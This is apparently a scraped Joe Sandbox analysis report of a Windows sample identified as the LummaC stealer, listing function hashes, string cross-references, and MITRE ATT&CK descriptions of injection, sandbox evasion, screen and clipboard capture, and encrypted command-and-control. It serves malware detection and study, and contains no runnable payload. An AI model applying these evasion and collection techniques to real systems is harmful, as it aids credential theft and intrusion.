Instruction ID: 7706bbbbbec342a1d01febe39c9efe95977577d08921922cc425325d225ddc2a
Opcode Fuzzy Hash: 09933760672cfd032ac23a4d7bbd6d2baf3617aa00eb7348fcbfb69fb9554c3a
Instruction Fuzzy Hash: F1F027B160411027DB2299449C80BB7BBACCB87724F090416E84853282D175AC8183EA

Function 00442420 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction ID: 54131857c841961323e1e78c39fea2b49ca1fdc8f82e107ca94fd6f64c7b616a
Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
Instruction Fuzzy Hash: 00D0A72160872146AB788E19A501977F7F0EEC7B11FC9955FF582E3258D634DC41C2AD

Function 0044A996 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c517529adfa1a4e827bb43f382155bc4a6f323728932466b22e848b0b8c91b92
Instruction ID: 863f9a41c2a8b2d817012a195484cb3f222df1f6781b053119093dc20f385d7d
Opcode Fuzzy Hash: c517529adfa1a4e827bb43f382155bc4a6f323728932466b22e848b0b8c91b92
Instruction Fuzzy Hash: 42900230D4D6018681088F009461574E239564F113E10701C800D334534670D500860C

Function 004386C1 Relevance: 87.6, APIs: 1, Strings: 49, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043875F

Strings

m, xrefs: 004386D6
E, xrefs: 00438810
], xrefs: 00438798
., xrefs: 00438829
Y, xrefs: 004387AC
u, xrefs: 004386CC
], xrefs: 00438793
;, xrefs: 004387ED
{, xrefs: 00438856
q, xrefs: 00438874
G, xrefs: 0043881A
o, xrefs: 00438892
2, xrefs: 004387A7
y, xrefs: 0043884C
I, xrefs: 004387FC
s, xrefs: 0043887E
u, xrefs: 00438860
', xrefs: 0043877A
h, xrefs: 004388A1
", xrefs: 004387D9
x, xrefs: 004387B1
S, xrefs: 004387DE
M, xrefs: 004387E8
T, xrefs: 00438789
[, xrefs: 004387B6
K, xrefs: 00438806
i, xrefs: 0043889C
n, xrefs: 004387F7
#, xrefs: 0043878E
I, xrefs: 00438775
_, xrefs: 004387A2
!, xrefs: 0043879D
U, xrefs: 004387C0
O, xrefs: 004387F2
#, xrefs: 004387E3
(, xrefs: 004387CF
Q, xrefs: 004387D4
}, xrefs: 00438838
!, xrefs: 00438784
W, xrefs: 004387CA
w, xrefs: 0043886A
Y, xrefs: 0043877F
m, xrefs: 00438888
k, xrefs: 004388A6
0, xrefs: 00438951
A, xrefs: 00438824
t, xrefs: 004387C5
C, xrefs: 0043882E
l, xrefs: 004386E0

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: !$!$"$#$#$'$($.$0$2$;$A$C$E$G$I$I$K$M$O$Q$S$T$U$W$Y$Y$[$]$]$_$h$i$k$l$m$m$n$o$q$s$t$u$u$w$x$y${$}
API String ID: 2525500382-3814532004
Opcode ID: 25b846d596966c83d945043b6368cd92609d5c6bb24e0f1e2ca4bdc7d2c33f20
Instruction ID: a23b54ab04a311a136ca735eb1fd8376573a1d777b4893d35d0836636ff2c035
Opcode Fuzzy Hash: 25b846d596966c83d945043b6368cd92609d5c6bb24e0f1e2ca4bdc7d2c33f20
Instruction Fuzzy Hash: 2F81B76040C7C0CED362DB68844875FFFE16BA6318F58499DE1E94B392C7BA8549CB27

Function 004379CF Relevance: 87.6, APIs: 1, Strings: 49, Instructions: 147memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00437A73

Strings

2, xrefs: 00437ABB
!, xrefs: 00437AB1
x, xrefs: 00437AC5
t, xrefs: 00437AD9
[, xrefs: 00437ACA
h, xrefs: 00437BB5
K, xrefs: 00437B1A
Q, xrefs: 00437AE8
], xrefs: 00437AA7
I, xrefs: 00437B10
#, xrefs: 00437AF7
], xrefs: 00437AAC
#, xrefs: 00437AA2
A, xrefs: 00437B38
w, xrefs: 00437B7E
l, xrefs: 004379F4
m, xrefs: 004379EA
I, xrefs: 00437A89
Y, xrefs: 00437A93
', xrefs: 00437A8E
!, xrefs: 00437A98
;, xrefs: 00437B01
y, xrefs: 00437B60
u, xrefs: 00437B74
n, xrefs: 00437B0B
m, xrefs: 00437B9C
i, xrefs: 00437BB0
Y, xrefs: 00437AC0
C, xrefs: 00437B42
S, xrefs: 00437AF2
", xrefs: 00437AED
0, xrefs: 00437C62
_, xrefs: 00437AB6
W, xrefs: 00437ADE
q, xrefs: 00437B88
O, xrefs: 00437B06
G, xrefs: 00437B2E
s, xrefs: 00437B92
T, xrefs: 00437A9D
E, xrefs: 00437B24
M, xrefs: 00437AFC
{, xrefs: 00437B6A
U, xrefs: 00437AD4
., xrefs: 00437B3D
}, xrefs: 00437B4C
u, xrefs: 004379E0
o, xrefs: 00437BA6
k, xrefs: 00437BBA
(, xrefs: 00437AE3

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: !$!$"$#$#$'$($.$0$2$;$A$C$E$G$I$I$K$M$O$Q$S$T$U$W$Y$Y$[$]$]$_$h$i$k$l$m$m$n$o$q$s$t$u$u$w$x$y${$}
API String ID: 2525500382-3814532004
Opcode ID: 9d67551c8b71ae16101116034b7f14c6528fe44e2d6e648e34e43c02479f22df
Instruction ID: 812749e6579258df855dfd5738a1ddc6c9a63d12918a485b272c2b3014194542
Opcode Fuzzy Hash: 9d67551c8b71ae16101116034b7f14c6528fe44e2d6e648e34e43c02479f22df
Instruction Fuzzy Hash: C881B66040C7C0CDE322D768948874FFFE16BA6318F08599DE5E94B392C7BA9549CB27

Function 00435931 Relevance: 82.4, APIs: 1, Strings: 46, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 004359E1

Strings

', xrefs: 00435A2A
w, xrefs: 00435AD2
e, xrefs: 00435A62
g, xrefs: 00435A52
!, xrefs: 00435AAA
0, xrefs: 00435CDE
:, xrefs: 00435A9A
o, xrefs: 00435A92
s, xrefs: 00435AB2
y, xrefs: 00435B02
E, xrefs: 00435B62
I, xrefs: 00435B82
i, xrefs: 00435A82
q, xrefs: 00435AC2
K, xrefs: 00435B72
W, xrefs: 00435BD2
X, xrefs: 0043595F
/, xrefs: 00435ADA
[, xrefs: 00435BF2
[, xrefs: 00435A0A
S, xrefs: 00435BB2
A, xrefs: 00435B42
$, xrefs: 00435A8A
S, xrefs: 0043594F
u, xrefs: 00435AE2
Q, xrefs: 00435BC2
a, xrefs: 00435A42
c, xrefs: 00435A32
O, xrefs: 00435B92
W, xrefs: 0043593F
M, xrefs: 00435BA2
C, xrefs: 00435B32
=, xrefs: 00435ABA
2, xrefs: 00435A4A
', xrefs: 00435A3A
O, xrefs: 004359FA
], xrefs: 00435C22
U, xrefs: 00435BE2
G, xrefs: 00435B52
Y, xrefs: 00435C02
P, xrefs: 00435A1A
m, xrefs: 00435AA2
}, xrefs: 00435B22
_, xrefs: 00435C12
k, xrefs: 00435A72
{, xrefs: 00435AF2

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: !$$$'$'$/$0$2$:$=$A$C$E$G$I$K$M$O$O$P$Q$S$S$U$W$W$X$Y$[$[$]$_$a$c$e$g$i$k$m$o$q$s$u$w$y${$}
API String ID: 2525500382-3537807276
Opcode ID: 394a8478d3ca95f3409243df219c71b699cc95753286442400ebb8b0c1032b05
Instruction ID: dc2c001a02250e3ce46724fd03c69a24241a07211eedf33c3fcfa394dd4ebc60
Opcode Fuzzy Hash: 394a8478d3ca95f3409243df219c71b699cc95753286442400ebb8b0c1032b05
Instruction Fuzzy Hash: 49A1907040CBC1CED3328B2894587DBBFD15BA6318F084A9DD5ED4A3D2C2BA4159CB67

Function 004367A6 Relevance: 26.3, APIs: 2, Strings: 13, Instructions: 84COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 004367B0
VariantInit.OLEAUT32 ref: 004367C3

Strings

E, xrefs: 0043688E
w, xrefs: 004367EE
K, xrefs: 0043687E
S, xrefs: 0043689E
A, xrefs: 0043680E
K, xrefs: 0043685E
H, xrefs: 0043681E
z, xrefs: 0043686E
V, xrefs: 0043684E
}, xrefs: 004367FE
P, xrefs: 004367DE
{, xrefs: 0043683E
b, xrefs: 0043682E

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: A$E$H$K$K$P$S$V$b$w$z${$}
API String ID: 2610073882-3082374276
Opcode ID: 73d221d5939af702e9acbf797e395fd09fd862b47d3647eb576610b9b6de78cb
Instruction ID: 4d699de1cae8dfef9a81abad2868d542b012eac497d3def629945dbf637e71b4
Opcode Fuzzy Hash: 73d221d5939af702e9acbf797e395fd09fd862b47d3647eb576610b9b6de78cb
Instruction Fuzzy Hash: 4A51C46040C7C1CAE371DB68C448B9FBFE0ABA6214F048E5EE4E99B2D2D7754549CB63

Function 00436BAB Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 87COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00436BB5
VariantInit.OLEAUT32 ref: 00436BC8

Strings

!, xrefs: 00436BEF
=, xrefs: 00436C03
', xrefs: 00436BE5
#, xrefs: 00436BF9
7, xrefs: 00436C35
?, xrefs: 00436C0D
;, xrefs: 00436C21
3, xrefs: 00436C49
y, xrefs: 00436BE0
1, xrefs: 00436C3F
9, xrefs: 00436C17
5, xrefs: 00436C2B

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$#$'$1$3$5$7$9$;$=$?$y
API String ID: 2610073882-3343189872
Opcode ID: ead48b1e63f1d85053b4f724cb616c414e45225da9d36266662588ed5ffc19ab
Instruction ID: f12a1a4c58e65ebed27f9c5f474b34814f929b34ea5b0fa9424d5df15ff6ef41
Opcode Fuzzy Hash: ead48b1e63f1d85053b4f724cb616c414e45225da9d36266662588ed5ffc19ab
Instruction Fuzzy Hash: 5841E67000C7C19ED362DB28858875BBFE0ABAA218F885E5DF5E4473D2C7758509CB57

Function 00435D11 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00435D1B
VariantInit.OLEAUT32 ref: 00435D2E

Strings

3, xrefs: 00435DAF
', xrefs: 00435D4B
!, xrefs: 00435D55
?, xrefs: 00435D73
7, xrefs: 00435D9B
;, xrefs: 00435D87
y, xrefs: 00435D46
#, xrefs: 00435D5F
=, xrefs: 00435D69
5, xrefs: 00435D91
1, xrefs: 00435DA5
9, xrefs: 00435D7D

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: !$#$'$1$3$5$7$9$;$=$?$y
API String ID: 2610073882-3343189872
Opcode ID: 47f290230778b65eb896eca16bae8d4cc9ddc7f6e61520d1f9c638ea2af7b68f
Instruction ID: e05529c6256870af8eb838267759a5b1180d4b7ce378c8c495f80ae4ebb40dca
Opcode Fuzzy Hash: 47f290230778b65eb896eca16bae8d4cc9ddc7f6e61520d1f9c638ea2af7b68f
Instruction Fuzzy Hash: F341D87000C7C18ED362DB28848875EBFE06BA6228F845E5DF5E48B3D2C7758549CB67

Function 00436157 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00436161
VariantInit.OLEAUT32 ref: 00436174

Strings

6, xrefs: 0043621F
T, xrefs: 004361EF
#, xrefs: 0043620F
{, xrefs: 0043618F
E, xrefs: 004361AF
V, xrefs: 004361DF
#, xrefs: 0043622F
J, xrefs: 004361BF
[, xrefs: 004361CF
X, xrefs: 0043619F

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: #$#$6$E$J$T$V$X$[${
API String ID: 2610073882-3138222373
Opcode ID: e9476f8b32fb5ded36cd3576109be5e25d03df6cb56f51ab480a0da5d393f16c
Instruction ID: 19ae04d35fc20d8ee419a391b5d6d6a2de212e1238211fd9a309745e2e08e2ed
Opcode Fuzzy Hash: e9476f8b32fb5ded36cd3576109be5e25d03df6cb56f51ab480a0da5d393f16c
Instruction Fuzzy Hash: 3E41D06010C7C1CEE331DB288458B9BFFE1ABA6214F088A9ED4E887392D7754149CB63

Function 00437E56 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 80COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00437E60
VariantInit.OLEAUT32 ref: 00437E73

Strings

5, xrefs: 00437EE1
I, xrefs: 00437F21
3, xrefs: 00437F11
O, xrefs: 00437EF1
-, xrefs: 00437EC9
/, xrefs: 00437EB9
+, xrefs: 00437E99
3, xrefs: 00437F31
$, xrefs: 00437F01
), xrefs: 00437EA9

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: $$)$+$-$/$3$3$5$I$O
API String ID: 2610073882-2956479557
Opcode ID: 0cff31dba61adbe35818d122a8f9565401ab69491906886ba741b0e78617e709
Instruction ID: 6d6f74c48e1cab9cdbf7a8cdba0d569d4aa69dc80f07f4353d6828928c68ba73
Opcode Fuzzy Hash: 0cff31dba61adbe35818d122a8f9565401ab69491906886ba741b0e78617e709
Instruction Fuzzy Hash: D441C26410C7C18ED331DB38954879FBFE1ABA6324F080A9DE5E98B392D774454ACB63

Function 004382DF Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 89COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 0043831E

Strings

S, xrefs: 0043837C
(, xrefs: 004383BC
w, xrefs: 004383AC
c, xrefs: 0043838C
T, xrefs: 0043834C
,, xrefs: 004383DC
Q, xrefs: 0043835C
T, xrefs: 0043833C
T, xrefs: 0043839C
n, xrefs: 0043836C

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: ($,$Q$S$T$T$T$c$n$w
API String ID: 1927566239-2354970113
Opcode ID: 4e2a446fe427af02382ad62d946519185417bb8eba0e67ced269f7c27b03ec86
Instruction ID: 369c7dcbb04dc4706d668e8ba501eb9334485367381ca7bbddf3c1d1c86f18a3
Opcode Fuzzy Hash: 4e2a446fe427af02382ad62d946519185417bb8eba0e67ced269f7c27b03ec86
Instruction Fuzzy Hash: 9251B47100C7C18ED331DB2894987DABFE0ABAA314F084A5DE4E84B3D2D7794555CB67

Function 00435F1F Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 61COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 00435F29

Strings

w, xrefs: 00435F8C
K, xrefs: 00435FAC
s, xrefs: 00435F6C
I, xrefs: 00435F9C
M, xrefs: 00435FBC
u, xrefs: 00435F7C
J, xrefs: 00435FB4
q, xrefs: 00435F5C

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: InitVariant
String ID: I$J$K$M$q$s$u$w
API String ID: 1927566239-3908742026
Opcode ID: f2f9ad91fcbf54125b3378c4026a82416d48cd91d7f9c0ad9661a021b1892b95
Instruction ID: 21bcd080b2c7749e544f74ad1b2812f74318f2511808b44c5d3b20db9a84497e
Opcode Fuzzy Hash: f2f9ad91fcbf54125b3378c4026a82416d48cd91d7f9c0ad9661a021b1892b95
Instruction Fuzzy Hash: 6F31E47004C7C2CAD331CB289144BAABBE0AB96314F140E6EE4E847792E3799805DB53

Function 0043A695 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 0043A6E0
GetSystemMetrics.USER32 ref: 0043A6EF

Strings

, xrefs: 0043A7C3

Memory Dump Source

Source File: 00000001.00000002.1820464419.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: dcc09331082e47582e595bb31fbd1b4bf0ebfa0a53f9499e36f4d6b41a8d2324
Instruction ID: 84da7dd3ce0f5ca54fdac53e413fe129d0012f150d1d98573b66e8af80a82a13
Opcode Fuzzy Hash: dcc09331082e47582e595bb31fbd1b4bf0ebfa0a53f9499e36f4d6b41a8d2324
Instruction Fuzzy Hash: 805161B5E142189FDB40EFACD985A9EBBF0BB48300F118529E498E7350D734A949CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
file.exe

Function 0040EC00 Relevance: 28.5, APIs: 1, Strings: 15, Instructions: 491
libraryCOMMON

Function 004403D0 Relevance: 16.9, APIs: 11, Instructions: 388
memoryCOMMON

Function 0040D060 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166
threadCOMMON

Function 0040F4B0 Relevance: 5.4, Strings: 4, Instructions: 401
COMMON

Function 004478C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14
libraryCOMMON

Function 00447A52 Relevance: 3.2, Strings: 2, Instructions: 665
COMMON

Function 00411DC7 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 306
COMMON

Function 00446B78 Relevance: 1.6, APIs: 1, Instructions: 79
libraryCOMMON

Function 00444490 Relevance: 1.6, APIs: 1, Instructions: 52
memoryCOMMON

Function 004402D8 Relevance: 1.5, APIs: 1, Instructions: 48
memoryCOMMON

Function 00411DA5 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON